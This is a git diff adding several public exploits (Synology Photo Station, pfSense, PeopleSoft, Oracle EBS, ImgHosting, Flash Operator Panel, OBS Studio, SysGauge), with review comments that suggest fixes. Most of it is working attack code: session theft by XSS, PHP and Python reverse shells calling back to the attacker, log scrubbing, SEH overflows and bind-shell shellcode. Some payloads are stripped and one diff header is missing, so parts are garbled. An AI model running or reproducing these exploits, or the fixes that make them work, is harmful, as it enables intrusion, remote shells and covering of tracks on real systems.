diff --git a/exploits/hardware/remote/43609.py b/exploits/hardware/remote/43609.py
new file mode 100755
index 000000000..a18b04fe9
--- /dev/null
+++ b/exploits/hardware/remote/43609.py
@@ -0,0 +1,304 @@ +#!/usr/local/bin/python +""" +Synology Photo Station <= 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability +Found by: mr_me +Tested: 6.8.2-3461 (latest at the time) +Vendor Advisory: https://www.synology.com/en-global/support/security/Synology_SA_18_02 + +# Summary: +========== + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Synology Photo Station. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. +The specific flaw exists within the SYNOPHOTO_Flickr_MultiUpload function. When parsing the prog_id parameter, the process does not properly validate a user-supplied string before using it to execute a call to file_put_contents. An attacker can leverage this vulnerability to execute code under the context of the PhotoStation user. + +# Example: +========== + +saturn:synology mr_me$ ./sinology.py 192.168.100.9 en0 + + Synology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability + mr_me + +(+) waiting for the admin... +(+) stolen: qt4obchbqfss2ap9ct9nb1i534 +(+) updated the settings! +(+) wrote php code! +(+) attempting race condition... +(+) won the race! +(+) rce is proven! +(+) deleted the image and scrubbed the logs! +(+) starting handler on port 4444 +(+) connection from 192.168.100.9 +(+) pop thy shell! 
+id +uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation) +""" + +import sys +import socket +import requests +import telnetlib +from threading import Thread +from base64 import b64encode as b64e +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +try: + import netifaces as ni +except: + print "(-) try 'pip install netifaces'" + sys.exit(1) + +# haven't pwned yet +pwned = False + +class xss(BaseHTTPRequestHandler): + def log_message(self, format, *args): + return + def do_GET(self): + global s + + # incase the referer isn't set, its coming from someone else + try: + referer = self.headers.get('Referer') + except: + referer = "" + + # of course this isn't bullet proof, but its enough for a poc + if t in referer: + if "PHPSESSID" in self.path: + s = self.path.split("=")[1] + print "(+) stolen: %s" % s + pwned = True + self.send_response(200) + self.end_headers() + return + +def _build_bd(raw=False): + php = ".gif" + if raw == True: + return php + return "photo_2f_%s" % (php.encode("hex")) + +def we_can_set_settings(target, session): + uri = "http://%s/photo/admin/share_setting.php" % target + d = { + "action" : "set_setting", + "social_flickr" : "on", + "share_upload_orig" : "on" + } + c = { "PHPSESSID" : session } + r = requests.post(uri, data=d, cookies=c).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def we_can_upload(target, session): + uri = "http://%s/photo/webapi/file.php" % (target) + p = { "SynoToken" : session } + c = { "PHPSESSID" : session } + + # valid gif, important + gif = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00" + gif += "\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c" + gif += "\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02" + f = { "original": ("si.gif", gif) } + d = { + "api": "SYNO.PhotoStation.File", + "method" : "uploadphoto", + "version" : 1, + "dest_folder_path": "", + "duplicate" : "rename", + "mtime": "1513540164787", + "filename" : _build_bd(True) + } + r = 
requests.post(uri, params=p, files=f, cookies=c, data=d).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def race(target): + r = "" + while("done" not in r): + r = requests.get("http://%s/photo/pwn.php" % target).text + return True + +def we_won_race(target, session, racing_thread): + while(racing_thread.isAlive()): + uri = "http://%s/photo/SocialNetwork/flickr.php" % target + d = { + "prog_id" : "../../volume1/@appstore/PhotoStation/photo/pwn.php", + "action" : "multi_upload", + "token" : 1, + "secret" : "", + "photoList" : _build_bd() + } + c = { "PHPSESSID": session } + requests.post(uri, cookies=c, data=d) + return True + +def build_php_code(): + phpkode = (""" + @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""") + phpkode += ("""$dis=@ini_get('disable_functions');""") + phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""") + phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """) + phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """) + phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 
2>&1\\n";} """) + phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""") + phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""") + phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """) + phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""") + phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """) + phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """) + phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """) + phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """) + phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """) + phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """) + phpkode += ("""$o=ob_get_contents();ob_end_clean(); """) + phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """) + phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """) + phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """) + phpkode += ("""$nofuncs='no exec functions'; """) + phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """) + phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (cb_host, cb_port)) + phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """) + phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """) + phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """) + phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """) + phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (cb_host, cb_port)) + phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """) + phpkode += ("""$out = '';if(substr($c,0,3) == 'cd 
'){chdir(substr($c,3,-1)); """) + phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """) + phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """) + phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """) + phpkode += ("""}@socket_close($s);} """) + return phpkode + +def exec_code(target): + handlerthr = Thread(target=handler, args=(cb_port,)) + handlerthr.start() + we_can_exec_php(target, b64e(build_php_code())) + +def handler(lport): + print "(+) starting handler on port %d" % lport + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lport)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" % addr[0] + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def we_can_exec_php(target, php): + h = { "SIN" : php } + r = requests.get("http://%s/photo/si.php" % target, headers=h) + if r.text == "pwn": + return True + return False + +def we_can_clean_up(target, session): + uri = "http://%s/photo/webapi/photo.php" % target + + d = { + "api": "SYNO.PhotoStation.Photo", + "method" : "delete", + "version" : 1, + "id" : _build_bd() + } + c = { "PHPSESSID" : session } + h = { "X-SYNO-TOKEN" : session } + r = requests.post(uri, cookies=c, data=d, headers=h).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def banner(): + return """\n\tSynology Photo Station SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability\n\tmr_me\n""" + +def do_xss(target, ip): + j = "\">" % ip + d = { + "api" : "SYNO.PhotoStation.Auth", + "method" : "login", + "version" : 1, + "username" : j, + "password" : "WAT", + "enable_syno_token" : "true" + } + r = requests.post("http://%s/photo/webapi/auth.php" % target, data=d).json() + +def we_can_clear_logs(target, session): + c = { "PHPSESSID" : session } + p = { "SynoToken" : session } + d = { + "api": 
"SYNO.PhotoStation.PhotoLog", + "method" : "clear", + "version" : 1, + } + r = requests.post("http://%s/photo/webapi/log.php" % target, data=d, params=p, cookies=c).json() + if "success" in r: + if r["success"] == True: + return True + return False + +def start_pain_train(t, s): + if we_can_set_settings(t, s): + print "(+) updated the settings!" + if we_can_upload(t, s): + print "(+) wrote php code!" + print "(+) attempting race condition..." + r = Thread(target=race, args=(t,)) + r.start() + if we_won_race(t, s, r): + print "(+) won the race!" + if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')): + print "(+) rce is proven!" + if we_can_clean_up(t, s) and we_can_clear_logs(t, s): + print "(+) deleted the image and scrubbed the logs!" + exec_code(t) + +def keep_running(): + if pwned == True: + return False + return True + +def main(): + print banner() + global cb_host, cb_port, s, t + if len(sys.argv) != 3: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 192.168.100.9 en0" % sys.argv[0] + sys.exit(1) + + s = "" + t = sys.argv[1] + cb_port = 4444 + + try: + cb_host = ni.ifaddresses(sys.argv[2])[2][0]['addr'] + except: + print "(-) no ip address associated with that interface!" + sys.exit(1) + + do_xss(t, cb_host) + + try: + server = HTTPServer(('0.0.0.0', 9090), xss) + print '(+) waiting for the admin...' + while keep_running(): + server.handle_request() + + except KeyboardInterrupt: + print '(+) shutting down the web server' + server.socket.close() + + if s != "": + start_pain_train(t, s) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/43594.txt b/exploits/java/webapps/43594.txt new file mode 100644 index 000000000..c3f1ec30d --- /dev/null +++ b/exploits/java/webapps/43594.txt 
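Review bot: `pwned = True` inside `xss.do_GET` binds a function-local name because the method only declares `global s`, so `keep_running()` never sees it and the `while keep_running(): server.handle_request()` loop in `main` ends only on Ctrl-C — the example transcript's automatic hand-off to `start_pain_train` cannot happen as written; change the declaration to `global s, pwned`. The bare `except:` around `self.headers.get('Referer')` swallows every error for no gain, since `referer = self.headers.get('Referer') or ""` already yields an empty string when the header is absent. Every `.json()` call on a response (`we_can_set_settings`, `we_can_upload`, `we_can_clean_up`, `we_can_clear_logs`) will raise on a non-JSON reply such as a login redirect, which aborts the run after the session was already stolen and settings changed; a guard that returns False on a decode error would keep the clean-up path reachable. The username payload in `do_xss` (`j = "\">" % ip`) appears to have lost its script tag in this rendering and should be checked against the original file before use.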
@@ -0,0 +1,57 @@
+# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56
+# Date: 30 Oct 2017
+# Exploit Author: Vahagn Vardanyan
+# Vendor Homepage: Oracle
+# Software Link: Oracle PeopleSoft
+# Version: 8.54, 8.55, 8.56
+# Tested on: Windows, Linux
+# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366
+
+The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56.
+
+POST /monitor/%SITE_NAME% HTTP/1.1
+Host: PeopleSoft:PORT
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0)
+Gecko/20100101 Firefox/51.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Connection: close
+Cookie:a=aa
+
+§JAVA_SERIAL§
+
+%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information
+disclosure or brute force. information for automation detection:
+
+ 1. If monitor component deployed and you don't know %SITE_NAME% then
+ will get this type of error
+
+

Site name is not valid. Check your URL syntax and try again.

+
+
+ 1. If %SITE_NAME% is true then you will get this message
+
+PeopleSoft
+
+Ping Test for Monitor Servlet
+
+Ping successful. Site %SITE_NAME% is valid.
+
+
+ 1. If monitor don't deployed then you will get this message
+
+Error 404--Not Found
+
+From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
+
+10.4.5 404 Not Found
+
+The server has not found anything matching the Request-URI. No
+indication is given of whether the condition is temporary or
+permanent.
+
+If the server does not wish to make this information available to the
+client, the status code 403 (Forbidden) can be used instead. The 410
+(Gone) status code SHOULD be used if the server knows, through some
+internally configurable mechanism, that an old resource is permanently
+unavailable and has no forwarding address.
\ No newline at end of file
diff --git a/exploits/jsp/webapps/43592.txt b/exploits/jsp/webapps/43592.txt
new file mode 100644
index 000000000..8401c1585
--- /dev/null
+++ b/exploits/jsp/webapps/43592.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Oracle E-Business suite Open Redirect
+# Google Dork: inurl:OA_HTML/cabo/
+# Date: April 2017
+# Exploit Author: [author]
+# Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
+# Software Link: [download link if available]
+# Version: Oracle E-Business Suite (REQUIRED)
+# Tested on: [relevant os]
+# CVE : CVE-2017-3528
+
+The exploit can be leveraged for an open redirect using the following
+exploit path:
+
+https://targetsite/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com
+
+Oracle E-Business suite is vulnerable to an open redirect issue,
+specifically the redirect parameter allows any domain to be supplied
+and it will be rendered on the target's site.
+
+Note I was also credited for this CVE, see the Oracle
+CPU(http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html)
\ No newline at end of file
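Review bot: The PoC body is only the placeholder `§JAVA_SERIAL§`, and nothing in the advisory says what must replace it — which serialization format, which gadget chain, or even a Content-Type — so the request as documented cannot be reproduced. The markers look like Burp Intruder insertion points (inferred from the `§` characters), which a reader without that context will not recognise. Suggest one sentence after the request such as `§JAVA_SERIAL§ marks where the raw Java serialized object (a deserialization payload built against the PeopleSoft classpath) goes; send it as the POST body.` The three response fingerprints are the most useful part for detection engineering and would read better as a list that also names the HTTP status each one comes with, since the 404 case is the only one stated today.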
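Review bot: The PoC uses `redirect=/\example.com` without explaining why the `/\` prefix matters: a value starting with `/` passes a naive "local path only" check, while browsers following the WHATWG URL parser treat `\` like `/` for http(s) and so read `/\example.com` as the protocol-relative `//example.com`. That is the whole point of the payload and should be spelled out, e.g. `The /\ prefix bypasses checks that only require a leading slash; browsers interpret /\example.com as //example.com.` The advisory also gives no remediation beyond the CPU link; a line noting that `redirect` should be validated against an allow-list of local paths (rejecting anything containing `//` or `\` after the leading slash) would help readers triaging this.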
diff --git a/exploits/php/webapps/43560.py b/exploits/php/webapps/43560.py
new file mode 100755
index 000000000..5015c6659
--- /dev/null
+++ b/exploits/php/webapps/43560.py
@@ -0,0 +1,110 @@ +#!/usr/bin/env python3 + +# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. +# Date: 2018-01-12 +# Exploit Author: absolomb +# Vendor Homepage: https://www.pfsense.org/ +# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ +# Version: <=2.1.3 +# Tested on: FreeBSD 8.3-RELEASE-p16 +# CVE : CVE-2014-4688 + +import argparse +import requests +import urllib +import urllib3 +import collections + +''' +pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. +This script will return a reverse shell on specified listener address and port. +Ensure you have started a listener to catch the shell before running! +''' + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Remote Host") +parser.add_argument('--lhost', help = 'Local Host listener') +parser.add_argument('--lport', help = 'Local Port listener') +parser.add_argument("--username", help = "pfsense Username") +parser.add_argument("--password", help = "pfsense Password") +args = parser.parse_args() + +rhost = args.rhost +lhost = args.lhost +lport = args.lport +username = args.username +password = args.password + + +# command to be converted into octal +command = """ +python -c 'import socket,subprocess,os; +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); +s.connect(("%s",%s)); +os.dup2(s.fileno(),0); +os.dup2(s.fileno(),1); +os.dup2(s.fileno(),2); +p=subprocess.call(["/bin/sh","-i"]);' +""" % (lhost, lport) + + +payload = "" + +# encode payload in octal +for char in command: + payload += ("\\" + oct(ord(char)).lstrip("0o")) + +login_url = 'https://' + rhost + '/index.php' +exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh" + +headers = [ + ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), + ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), + ('Accept-Language', 'en-US,en;q=0.5'), + 
('Referer',login_url), + ('Connection', 'close'), + ('Upgrade-Insecure-Requests', '1'), + ('Content-Type', 'application/x-www-form-urlencoded') +] + +# probably not necessary but did it anyways +headers = collections.OrderedDict(headers) + +# Disable insecure https connection warning +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +client = requests.session() + +# try to get the login page and grab the csrf token +try: + login_page = client.get(login_url, verify=False) + + index = login_page.text.find("csrfMagicToken") + csrf_token = login_page.text[index:index+128].split('"')[-1] + +except: + print("Could not connect to host!") + exit() + +# format login variables and data +if csrf_token: + print("CSRF token obtained") + login_data = [('__csrf_magic',csrf_token), ('usernamefld',username), ('passwordfld',password), ('login','Login') ] + login_data = collections.OrderedDict(login_data) + encoded_data = urllib.parse.urlencode(login_data) + +# POST login request with data, cookies and header + login_request = client.post(login_url, data=encoded_data, cookies=client.cookies, headers=headers) +else: + print("No CSRF token!") + exit() + +if login_request.status_code == 200: + print("Running exploit...") +# make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell + try: + exploit_request = client.get(exploit_url, cookies=client.cookies, headers=headers, timeout=5) + if exploit_request.status_code: + print("Error running exploit") + except: + print("Exploit completed") \ No newline at end of file diff --git a/exploits/php/webapps/43567.txt b/exploits/php/webapps/43567.txt new file mode 100644 index 000000000..98ad6a1b3 --- /dev/null +++ b/exploits/php/webapps/43567.txt 
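Review bot: `if login_request.status_code == 200:` does not establish that authentication succeeded — a rejected login to pfSense's `index.php` is, as far as I recall, answered with 200 and the login form again — so bad credentials still print `Running exploit...`, the injection request goes out unauthenticated, and the timeout branch then reports `Exploit completed`. Check for the login form instead, e.g. `if login_request.status_code == 200 and 'usernamefld' not in login_request.text:`. The bare `except:` around the CSRF fetch hides the real cause (DNS, TLS, timeout) behind `Could not connect to host!`; `except requests.RequestException as e:` and printing `e` costs nothing, and the same applies to the bare `except:` that reports `Exploit completed` for any exception, not just the expected read timeout. `verify=False` with urllib3 warnings disabled is reasonable for a self-signed pfSense, but a comment saying so would stop someone copying the pattern into code that talks to real endpoints.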
@@ -0,0 +1,28 @@ +# Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting +# Date: 12-01-2018 +# Exploit Author: Dennis Veninga +# Contact Author: d.veninga [at] networking4all.com +# Vendor Homepage: foxsash.com +# Version: 1.5 +# CVE-ID: CVE-2018-5479 + +ImgHosting – Image Storage System quick and easy image hosting without +registration. Service is ideal for fast and reliable placement of images +for forums, blogs and websites. Simple design, comfortable customers, +direct links to pictures. This hosting service that we do every day use. +Like thousands of other people. We do service to the people. + +ImgHosting 1.5 (According footer information) is vulnerable to XSS attacks. +The affected function is its search engine. Since there is an user/admin +login interface, it's possible for attackers to steal sessions of users and +thus admin(s). By sending users an infected URL, code will be executed. + +--------------------------- +--------------------------- +PoC: + +http://{TARGET}/?search="> + +3. Solution: + +https://www.ilias.de/docu/goto.php?target=lm_1719&client_id=docu + +4. References: + +https://nvd.nist.gov/vuln/detail/CVE-2018-5688 +https://www.ilias.de/docu/goto_docu_pg_75029_35.html \ No newline at end of file diff --git a/exploits/php/webapps/43600.txt b/exploits/php/webapps/43600.txt new file mode 100644 index 000000000..797e64422 --- /dev/null +++ b/exploits/php/webapps/43600.txt 
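Review bot: The PoC line `http://{TARGET}/?search=">` has lost its payload — whatever followed the `">` break-out was stripped when this page was rendered — so the advisory as shown demonstrates only an attribute break-out, not script execution, and should be checked against the original file before it is relied on. Beyond that URL the advisory does not say where `search` is reflected (inside an attribute, as the `">` suggests, or in the page body) nor that the fix is context-appropriate output encoding of the search term; one sentence on each would make it actionable for the vendor. The text after the PoC (`3. Solution: https://www.ilias.de/…`, CVE-2018-5688) belongs to a different advisory whose `diff --git` header is missing from this rendering, so the boundary of this hunk is uncertain.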
@@ -0,0 +1,179 @@ +Document Title: +=============== +Flash Operator Panel v2.31.03 - Command Execution Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1907 + + +Release Date: +============= +2018-01-08 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1907 + + +Common Vulnerability Scoring System: +==================================== +6.2 + + +Vulnerability Class: +==================== +Command Injection + + +Current Estimated Price: +======================== +2.000a! - 3.000a! + + +Product & Service Introduction: +=============================== +The most comprehensive and affordable reporting and realtime monitor package for AsteriskA(c) based Call Centers. +A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists, +Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3). +Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only +required for the visual phonebook, call history and recordings interface. + +(Copy of the Vendor Homepage: https://www.fop2.com/index.php ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a remote command execution in the official Flash Operator Panel v2.31.03. 
+ + +Vulnerability Disclosure Timeline: +================================== +2018-01-08: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Nicolas Gudino (Asternic) +Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A command inject web vulnerability has been discovered in the official Flash Operator Panel v2.31.03 web-application. +The security vulnerability allows remote attackers to inject own system specific commands via web-application. + +The command inject web vulnerability is located in the the `command` path variable paramter of the `index.php` file. +Remote attackers with low privileged web-application user account roles are able to perform command requests via +callforward module. Thus allows an user account with restricted privileges to perform unauthorized command requests +to compromise the operator panel web-application. The request method to inject the malicious command to the index path +variable is GET. The attack is limited on exploitation to a restricted authenticated user account of the application. + +The security risk of the command injection is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. +Exploitation of the command inject vulnerability requires a low privileged web-application user account and no user interaction. +Successful exploitation of the vulnerability results in web-application-, database management system or web-server -compromise. 
+ +Request Method(s): +[+] GET + +Vulnerable Module(s): +[+] UCP - User Control Panel + +Vulnerable File(s): +[+] index.php + +Vulnerable Parameter(s): +[+] command + + +Proof of Concept (PoC): +======================= +The vulnerability can be exploited by remote attackers without user interaction and with low privileged user account. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: Exploitation +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command=./&[Variable Command Inject Vulnerability!] + + +PoC: Vulnerable Source (command) +($_REQUEST['quietmode']) && $user !== false && !empty($user)) +(isset($_REQUEST['command']) && ($_REQUEST['command'] == 'login' +$_REQUEST['command'] == 'forgot' +$_REQUEST['command'] == 'reset'))) { +$m = !empty($_REQUEST['module']) ? $_REQUEST['module'] : null; +$ucp->Ajax->doRequest($m,$_REQUEST['command']); + +Note: The request can be performed by restricted user accounts of the user control panel for higher access privileges. +The main administrator can use the command parameter to attack the backend of the main administrator by the same method. +The callforward uses the command variable to execute which is the same method performed for basic restricted user accounts. + + +Reference(s): +http://ucp-fop.localhost:8000/ +http://ucp-fop.localhost:8000/ucp/ +http://ucp-fop.localhost:8000/ucp/index.php +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337 +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward +http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command + + +Solution - Fix & Patch: +======================= +The command injection web vulnerability can be patched by a secure approval of the command parameter in the index.php file GET method request. 
+Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks. + + +Security Risk: +============== +The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2). + + +Credits & Authors: +================== +Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or +implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any +case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its +suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental +or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface +websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories +or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, +phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 
+ +Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab + +Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark +of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. + + Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/exploits/windows/dos/43596.py b/exploits/windows/dos/43596.py new file mode 100755 index 000000000..8799209a6 --- /dev/null +++ b/exploits/windows/dos/43596.py 
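Review bot: The quoted source does not support the advisory's claim of system command execution: `$ucp->Ajax->doRequest($m,$_REQUEST['command'])` shows the `command` parameter selecting an Ajax request handler by name (inferred from the call shape), and the PoC `command=./&[Variable Command Inject Vulnerability!]` never shows a shell command being run or its output. Either include the handler code that passes the parameter to an exec-style call, or retitle the finding as an authenticated low-privilege user reaching arbitrary UCP Ajax actions, which is what the snippet and the `$user !== false && !empty($user)` guard actually demonstrate. The risk text is internally inconsistent — `Severity Level: High` against a stated CVSS of 6.2 — and the fix advice `disallow the usage of special chars` misses the point if this is a dispatch issue: `command` should be validated against the set of actions the current user's role is allowed to invoke.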
@@ -0,0 +1,32 @@
+author = '''
+
+ ##############################################
+ # Created: ScrR1pTK1dd13 #
+ # Name: Greg Priest #
+ # Mail: ScR1pTK1dd13.slammer@gmail.com #
+ ##############################################
+
+# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
+# Date: 2018.01.15
+# Exploit Author: Greg Priest
+# Version: OBS-Studio-20.1.3
+# Tested on: Windows7 x64 HUN/ENG Enterprise
+# Software Download Link: https://obsproject.com/download
+
+'''
+
+bug = '''
+Vulnerable input field:
+<1> Copy printed "AAAAA...." string to clipboard!
+<2> Profile -> New
+<3> Paste the string in the input then press Ok
+
+'''
+junk = "A" * 459
+SEH = "BBBB"
+nextSEH = "CCCC"
+overflow = "D" * 19533
+
+print author
+print "String: ", junk + SEH + nextSEH + overflow
+print bug
\ No newline at end of file
diff --git a/exploits/windows/remote/43588.py b/exploits/windows/remote/43588.py
new file mode 100755
index 000000000..230aaafc3
--- /dev/null
+++ b/exploits/windows/remote/43588.py
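Review bot: The variable names invert the x86 SEH record layout: the four bytes that land right after the 459-byte `junk` overwrite the next-record pointer (nSEH) and the following four the handler address, yet the script names them `SEH = "BBBB"` then `nextSEH = "CCCC"`, so anyone building on this PoC will put the short jump and the POP/POP/RET address in the wrong slots. Renaming to `nseh = "BBBB"` and `seh = "CCCC"` and keeping the concatenation order `junk + nseh + seh + overflow` fixes this without changing the printed string. The script is Python 2 (`print author`) with no shebang, and the 19533-byte tail is unexplained; a one-line comment that the four parts sum to 20000 bytes would tell the reader the total is deliberate.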
@@ -0,0 +1,103 @@ +# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow +# Exploit Author: Ahmad Mahfouz +# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH +# Contact: http://twitter.com/eln1x +# Date: 12/01/2018 +# CVE: CVE-2018-5359 +# Version: 3.6.18 +# Tested on: Windows 7 x64 +# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe + + + +from struct import pack +from os import system +from sys import exit +from time import sleep +import socket + + + +port = 9221 +host = '192.168.72.231' + + +stage1 = "\x83\xc4\x7f" *16 # metasm > add esp,127 +stage1 += "\x83\xc4\x04"    # metasm > add esp,4 +stage1 +=  "\xff\xe4"       # metasm > jmp esp +# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02' + +buf =  "" +buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31" +buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f" +buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b" +buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a" +buf += 